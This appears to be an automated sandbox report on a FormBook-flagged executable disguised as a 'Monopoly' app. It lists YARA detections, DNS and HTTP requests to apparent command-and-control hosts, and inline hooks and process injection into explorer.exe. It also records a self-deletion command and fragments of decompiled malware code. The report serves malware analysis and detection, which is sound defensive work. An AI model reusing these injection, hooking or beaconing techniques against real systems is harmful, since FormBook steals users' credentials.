                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, db5p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/323574/sample/emthree.exe

                                          Simulations

                                          Behavior and APIs

                                          Time | Type | Description
                                          06:36:09 | API Interceptor | 15x Sleep call for process: emthree.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          No context

                                          ASN


                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.log
                                          Process:C:\Users\user\Desktop\emthree.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1301
                                          Entropy (8bit):5.345637324625647
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4VE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz5
                                          MD5:6C42AAF2F2FABAD2BAB70543AE48CEDB
                                          SHA1:8552031F83C078FE1C035191A32BA43261A63DA9
                                          SHA-256:51D07DD061EA9665DA070B95A4AC2AC17E20524E30BF6A0DA8381C2AF29CA967
                                          SHA-512:014E89857B811765EA7AA0B030AB04A2DA1957571608C4512EC7662F6A4DCE8B0409626624DABC96CBFF079E7F0F4A916E6F49C789E00B6E46AD37C36C806DCA
                                          Malicious:true
                                          Reputation:moderate, very likely benign file
                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.696882160461213
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          • DOS Executable Generic (2002/1) 0.01%
                                          File name:emthree.exe
                                          File size:459776
                                          MD5:25b5788669a3a8f35596ce975f0823a7
                                          SHA1:77e07883f131f342e3d24954ea348d25554440a1
                                          SHA256:f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
                                          SHA512:53f7273b1d20ec613cb1bcb0c4a30272c90f8585515be013f52be236e9cccc4457b2fab52b9649092807f4de9ab9da21a11d63897c0ed8e9fff02eebefaf1f03
                                          SSDEEP:12288:YK8UvYOUgUihAbxk6nVTBWOfK/Kl3+XXt8LF:YK8Uv2dbvT0OfKClid8
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f................0.............f.... ... ....@.. .......................`............@................................

                                          File Icon

                                          Icon Hash:00828e8e8686b000

                                          Static PE Info

                                          General

                                          Entrypoint:0x471966
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:v4.0.30319
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                          Entrypoint Preview

                                          Instruction
                                          jmp dword ptr [00402000h]
                                          add byte ptr [eax], al

                                          Data Directories

                                          Name | Virtual Address | Virtual Size | Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x71914 | 0x4f | .text
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x72000 | 0x594 | .rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x74000 | 0xc | .reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x718f8 | 0x1c | .text
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                          Sections

                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                          .text | 0x2000 | 0x6f96c | 0x6fa00 | False | 0.841486299692 | data | 7.70662287757 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rsrc | 0x72000 | 0x594 | 0x600 | False | 0.415364583333 | data | 4.06023267139 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .reloc | 0x74000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                          Resources

                                          Name | RVA | Size | Type | Language | Country
                                          RT_VERSION | 0x72090 | 0x304 | data | |
                                          RT_MANIFEST | 0x723a4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                          Imports

                                          DLL | Import
                                          mscoree.dll | _CorExeMain

                                          Version Infos

                                          Description | Data
                                          Translation | 0x0000 0x04b0
                                          LegalCopyright | Copyright 2019
                                          Assembly Version | 1.0.0.0
                                          InternalName | .exe
                                          FileVersion | 1.0.0.0
                                          CompanyName |
                                          LegalTrademarks |
                                          Comments |
                                          ProductName | Monopoly
                                          ProductVersion | 1.0.0.0
                                          FileDescription | Monopoly
                                          OriginalFilename | .exe

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets


                                          UDP Packets


                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          Nov 27, 2020 06:37:04.756514072 CET | 192.168.2.5 | 8.8.8.8 | 0x7fe5 | Standard query (0) | www.asojebu.com | A (IP address) | IN (0x0001)
                                          Nov 27, 2020 06:37:26.103823900 CET | 192.168.2.5 | 8.8.8.8 | 0x74c | Standard query (0) | www.haircuressteampod.com | A (IP address) | IN (0x0001)
                                          Nov 27, 2020 06:37:46.346628904 CET | 192.168.2.5 | 8.8.8.8 | 0xe6ba | Standard query (0) | www.porncamslivechat.com | A (IP address) | IN (0x0001)
                                          Nov 27, 2020 06:38:07.318126917 CET | 192.168.2.5 | 8.8.8.8 | 0x5dad | Standard query (0) | www.amarilloautoexpress.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Nov 27, 2020 06:37:05.704509974 CET | 8.8.8.8 | 192.168.2.5 | 0x7fe5 | Name error (3) | www.asojebu.com | none | none | A (IP address) | IN (0x0001)
                                          Nov 27, 2020 06:37:26.162023067 CET | 8.8.8.8 | 192.168.2.5 | 0x74c | Name error (3) | www.haircuressteampod.com | none | none | A (IP address) | IN (0x0001)
                                          Nov 27, 2020 06:37:46.497160912 CET | 8.8.8.8 | 192.168.2.5 | 0xe6ba | No error (0) | www.porncamslivechat.com | porncamslivechat.com | | CNAME (Canonical name) | IN (0x0001)
                                          Nov 27, 2020 06:37:46.497160912 CET | 8.8.8.8 | 192.168.2.5 | 0xe6ba | No error (0) | porncamslivechat.com | | 184.154.50.243 | A (IP address) | IN (0x0001)
                                          Nov 27, 2020 06:38:07.721736908 CET | 8.8.8.8 | 192.168.2.5 | 0x5dad | No error (0) | www.amarilloautoexpress.com | | 23.27.109.19 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.porncamslivechat.com
                                          • www.amarilloautoexpress.com

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.5 | 49746 | 184.154.50.243 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Nov 27, 2020 06:37:46.629072905 CET | 5535 | OUT | GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1
                                          Host: www.porncamslivechat.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 27, 2020 06:37:48.018973112 CET | 5536 | IN | HTTP/1.1 404 Not Found
                                          Date: Fri, 27 Nov 2020 05:37:46 GMT
                                          Server: Apache
                                          Link: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Set-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Referrer-Policy: no-referrer-when-downgrade
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Nov 27, 2020 06:37:48.019191980 CET5549INData Raw: 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 6d 65 6e 75 2e 70 6e 67 22 20 61 6c 74 3d 22 53 65 61 72
                                          Data Ascii: ttp://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/menu.png" alt="Search" /> </a> <a href="javascript:void(0)" class="mobile-search"> <img src="http://porncamslivechat.com/wp-content


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.5 | 49747 | 23.27.109.19 | 80 | C:\Windows\explorer.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Nov 27, 2020 06:38:07.894825935 CET | 5550 | OUT | GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1
                                          Host: www.amarilloautoexpress.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Nov 27, 2020 06:38:08.068506002 CET | 5551 | IN | HTTP/1.1 200 OK
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                          X-Powered-By: Nginx
                                          Date: Fri, 27 Nov 2020 05:38:20 GMT
                                          Connection: close
                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                          Data Ascii: 3


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                          Function Name | Hook Type | Active in Processes
                                          PeekMessageA | INLINE | explorer.exe
                                          PeekMessageW | INLINE | explorer.exe
                                          GetMessageW | INLINE | explorer.exe
                                          GetMessageA | INLINE | explorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                          Function Name | Hook Type | New Data
                                          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEA
                                          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8F 0xFE 0xEA

                                          System Behavior

                                          General

                                          Start time:06:36:03
                                          Start date:27/11/2020
                                          Path:C:\Users\user\Desktop\emthree.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\emthree.exe'
                                          Imagebase:0xf40000
                                          File size:459776 bytes
                                          MD5 hash:25B5788669A3A8F35596CE975F0823A7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:06:36:10
                                          Start date:27/11/2020
                                          Path:C:\Users\user\Desktop\emthree.exe
                                          Wow64 process (32bit):true
                                          Commandline:{path}
                                          Imagebase:0x460000
                                          File size:459776 bytes
                                          MD5 hash:25B5788669A3A8F35596CE975F0823A7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:06:36:12
                                          Start date:27/11/2020
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:06:36:25
                                          Start date:27/11/2020
                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\rundll32.exe
                                          Imagebase:0xac0000
                                          File size:61952 bytes
                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          General

                                          Start time:06:36:29
                                          Start date:27/11/2020
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del 'C:\Users\user\Desktop\emthree.exe'
                                          Imagebase:0x150000
                                          File size:232960 bytes
                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          General

                                          Start time:06:36:30
                                          Start date:27/11/2020
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff797770000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Disassembly

                                          Code Analysis

                                            Executed Functions

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032AFE4A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032AFE4A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 032AFE4A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 032A5421
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 032A5421
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,032AB8BE,?,?,?,?,?), ref: 032AB97F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,032AB8BE,?,?,?,?,?), ref: 032AB97F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,032A9991,00000800,00000000,00000000), ref: 032A9BA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,032A9991,00000800,00000000,00000000), ref: 032A9BA2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 032A9916
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 032A9916
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.239011055.00000000032A0000.00000040.00000001.sdmp, Offset: 032A0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Executed Functions

                                            C-Code - Quality: 23%
                                            			E00419FF0(void* __ebx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a40) {
                                            				void* _v3;
                                            				intOrPtr _t13;
                                            				void* _t14;
                                            				void* _t18;
                                            				intOrPtr _t20;
                                            				void* _t27;
                                            				intOrPtr* _t28;
                                            				void* _t29;
                                            
                                            				_t13 = _a4;
                                            				_t20 =  *((intOrPtr*)(_t13 + 0x10));
                                            				_t28 = _t13 + 0xc48;
                                            				_t14 = E0041AB40(_t27, _t13, _t28, _t20, 0, 0x2a);
                                            				 *((intOrPtr*)(__ebx - 0x3b7cdbb3)) =  *((intOrPtr*)(__ebx - 0x3b7cdbb3)) - _t20;
                                            				asm("adc al, 0x52");
                                            				_t12 =  &_a8; // 0x414d42
                                            				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28, _t20, _t14 - 0x8b, _t29); // executed
                                            				return _t18;
                                            			}












                                            APIs
                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A035
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: BMA$BMA
                                            • API String ID: 2738559852-2163208940
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A035
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: BMA$BMA
                                            • API String ID: 2738559852-2163208940
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                            				char* _v8;
                                            				struct _EXCEPTION_RECORD _v12;
                                            				struct _OBJDIR_INFORMATION _v16;
                                            				char _v536;
                                            				void* _t15;
                                            				struct _OBJDIR_INFORMATION _t17;
                                            				struct _OBJDIR_INFORMATION _t18;
                                            				void* _t30;
                                            				void* _t31;
                                            				void* _t32;
                                            
                                            				_v8 =  &_v536;
                                            				_t15 = E0041C830( &_v12, 0x104, _a8);
                                            				_t31 = _t30 + 0xc;
                                            				if(_t15 != 0) {
                                            					_t17 = E0041CC50(__eflags, _v8);
                                            					_t32 = _t31 + 4;
                                            					__eflags = _t17;
                                            					if(_t17 != 0) {
                                            						E0041CED0( &_v12, 0);
                                            						_t32 = _t32 + 8;
                                            					}
                                            					_t18 = E0041B080(_v8);
                                            					_v16 = _t18;
                                            					__eflags = _t18;
                                            					if(_t18 == 0) {
                                            						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
